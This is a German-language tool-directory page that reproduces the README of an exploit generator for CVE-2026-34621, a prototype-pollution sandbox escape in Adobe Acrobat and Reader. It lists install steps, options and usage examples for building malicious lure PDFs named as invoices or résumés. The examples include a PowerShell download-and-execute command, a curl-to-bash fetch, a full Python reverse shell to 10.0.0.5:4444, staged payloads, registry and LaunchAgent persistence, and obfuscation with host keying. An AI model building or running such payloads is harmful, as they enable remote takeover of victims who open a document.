Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve_2026_34621_advanced — Ein hochentwickelter, plattformübergreifender Exploit-Generator für **CVE-2026-34621** – eine kritische Prototype-Pollution-Schwachstelle in Adobe Acrobat und Reader, die zu Sandbox-Escape und beliebiger Codeausführung unter Windows und macOS führt. | Kitploit
Tools/GitHubGitHub/null200ok/cve_2026_34621_advanced
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubnull200ok/cve_2026_34621_advanced

cve_2026_34621_advanced

Ein hochentwickelter, plattformübergreifender Exploit-Generator für **CVE-2026-34621** – eine kritische Prototype-Pollution-Schwachstelle in Adobe Acrobat und Reader, die zu Sandbox-Escape und beliebiger Codeausführung unter Windows und macOS führt.

Repository anzeigen
13612vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-34621 Erweiterter Exploit-Generator

Python 3.7+ License

Ein ausgefeilter, plattformübergreifender Exploit-Generator für CVE-2026-34621 – eine kritische Prototype-Pollution-Schwachstelle in Adobe Acrobat und Reader, die zu Sandbox-Escape und beliebiger Codeausführung unter Windows und macOS führt.

⚠️ WICHTIGER HINWEIS
Dieses Tool ist ausschließlich für autorisierte Sicherheitsforschung und Penetrationstests gedacht.
Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Testgenehmigung haben, ist illegal. Der Autor übernimmt keine Haftung für Missbrauch.


📋 Inhaltsverzeichnis

  • Überblick
  • Funktionen
  • Installation
  • Schnellstart
  • Anwendungsbeispiele
    • Windows-Befehle
    • macOS-Befehle
    • Mobile Tests
  • Befehlszeilenoptionen
  • So funktioniert es
  • Betroffene Versionen
  • Gegenmaßnahmen
  • Mitwirken
  • Lizenz

🔍 Überblick

CVE-2026-34621 ist eine Zero-Day-Schwachstelle in Adobe Acrobat und Reader, die es einem Angreifer ermöglicht:

  1. Das JavaScript-Objekt-Prototype innerhalb der Adobe-Engine zu verschmutzen.
  2. Die Sicherheits-Sandbox zu umgehen.
  3. Beliebige Systembefehle auf dem Rechner des Opfers auszuführen.

Dieser Generator erstellt eine bösartige PDF-Datei, die beim Öffnen in einer verwundbaren Version von Adobe Reader automatisch eine auf das Betriebssystem des Opfers zugeschnittene Payload ausführt.

Unterstützte Zielplattformen:

  • ✅ Windows (vollständige beliebige Codeausführung)
  • ✅ macOS (vollständige beliebige Codeausführung)
  • ❌ Android / iOS (nicht verwundbar – nur Demo-Fallback)

✨ Funktionen

KategorieFähigkeiten
Plattformübergreifende PayloadsErkennt das Betriebssystem automatisch und wählt die geeignete Windows- oder macOS-Befehlsausführungsmethode.
Mehrere Ausführungsvektorencmd.exe, PowerShell, WScript.Shell (Windows) / Terminal.app, osascript (macOS).
Gestaffelte PayloadsHerunterladen und Ausführen von Second-Stage-Payloads von einer Remote-URL.
PersistenzInstalliert Registry-Run-Key (Windows) oder LaunchAgent (macOS).
UmgehungstechnikenDrei Stufen der JavaScript-Verschleierung, Umgebungs-Keying, Ausführungsverzögerungen, polymorpher Code.
PDF-Köder-EinbettungEinbetten des Exploits in ein legitim aussehendes PDF (erfordert PyPDF2).
Mehrere AuslöserOpenAction, Seitenöffnungsaktion oder JavaScript auf Dokumentebene.
Umfassende BerichteHTML-, TXT- und JSON-Berichte mit Details zur Payload-Konfiguration.

📦 Installation

1. Repository klonen

git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit

2. (Optional) Virtuelle Umgebung erstellen

python3 -m venv venv
source venv/bin/activate      # Linux/macOS
venv\Scripts\activate         # Windows

3. Abhängigkeiten installieren

Das Kernskript verwendet nur die Python-Standardbibliothek. Für die PDF-Köder-Zusammenführungsfunktion PyPDF2 installieren:

pip install PyPDF2

🚀 Schnellstart

Ein einfaches PDF generieren, das unter Windows und macOS den Rechner öffnet:

python3 cve_2026_34621_advanced.py -o test.pdf

Dies erstellt:

test.pdf – Die bösartige PDF-Datei.

test_report.html – Detaillierter HTML-Bericht.

test_report.txt – Zusammenfassung im Klartext.

test_config.json – JSON-Konfigurationsexport.

💻 Anwendungsbeispiele

Windows-Befehle

1-Szenario Befehl

A-Basis-calc.exe-Popup

python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe

PowerShell-Reverse-Shell

python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""

Gestaffelte Payload mit Persistenz

python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p

Umgebungs-Keying (nur auf "SALES-PC" ausführen)

python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC

Mit Verschleierungsstufe 2 und 10-Sekunden-Verzögerung

python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10

macOS-Befehle

2-Szenario Befehl

Rechner öffnen

python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"

Skript herunterladen und ausführen

python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"

Reverse-Shell über Python

python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

Persistenz über LaunchAgent

python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p

Einbettung in ein Köder-PDF

python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen

3-Hinweis zu mobilen Tests

Das Skript selbst läuft auf dem Desktop (Windows/macOS/Linux), um das PDF zu generieren. Das generierte PDF kann auf Android- oder iOS-Geräten geöffnet werden, aber:

Mobile Versionen von Adobe Acrobat Reader sind nicht anfällig für CVE-2026-34621.

Die Payload löst einen harmlosen Demo-Fallback aus (öffnet eine URL oder zeigt einen Hinweis), anstatt Systembefehle auszuführen.

📖 Befehlszeilenoptionen

Option Beschreibung

-o, --output DATEI Erforderlich. Name der Ausgabe-PDF-Datei.

--win BEFEHL Windows-Befehl zur Ausführung (Standard: calc.exe).

--mac BEFEHL macOS-Befehl zur Ausführung (Standard: open /System/Applications/Calculator.app).

--stage URL URL zum Herunterladen der Second-Stage-Payload.

-p, --persistence Persistenzmechanismus installieren (Registry/LaunchAgent).

-O, --obfuscate STUFE JavaScript-Verschleierungsstufe (0=keine, 1=grundlegend, 2=mittel, 3=fortgeschritten).

-d, --delay SEKUNDEN Ausführung um angegebene Sekunden verzögern.

-k, --key HOSTNAME Umgebungs-Keying – nur bei passendem Hostnamen ausführen.

-l, --lure PDF Pfad zu einem legitimen PDF als Köder (führt Exploit zusammen).

--trigger TYP Auslöser-Vektor: openaction, pageopen oder doclevel.

--no-reports Generierung von HTML/TXT/JSON-Berichten überspringen.

--seed N Zufallsseed für reproduzierbare polymorphe Generierung festlegen.

⚙️ So funktioniert es

Angriffskette

Prototype-Pollution:

Das eingebettete JavaScript modifiziert Object.prototype, um bösartige Eigenschaften (__trusted, privileged usw.) zu injizieren. Dies verwirrt die Vertrauensgrenze der Adobe-JavaScript-Engine.

Kontext-Eskalation

Aufgrund des verschmutzten Prototypes behandelt die Engine nicht vertrauenswürdiges Dokument-JavaScript fälschlicherweise so, als würde es in einem privilegierten Kontext ausgeführt.

Zugriff auf privilegierte APIs

Das Skript kann nun eingeschränkte APIs wie app.launchURL, util.readFileIntoStream und app.trustedFunction aufrufen.

Sandbox-Escape

Diese APIs ermöglichen Dateisystemzugriff und Prozessausführung außerhalb der Adobe-Sandbox.

Beliebige Codeausführung

Das Skript führt den Befehl des Angreifers mit betriebssystemspezifischen Methoden aus:

Windows: cmd.exe /c, PowerShell oder WScript.Shell.

Tool herunterladen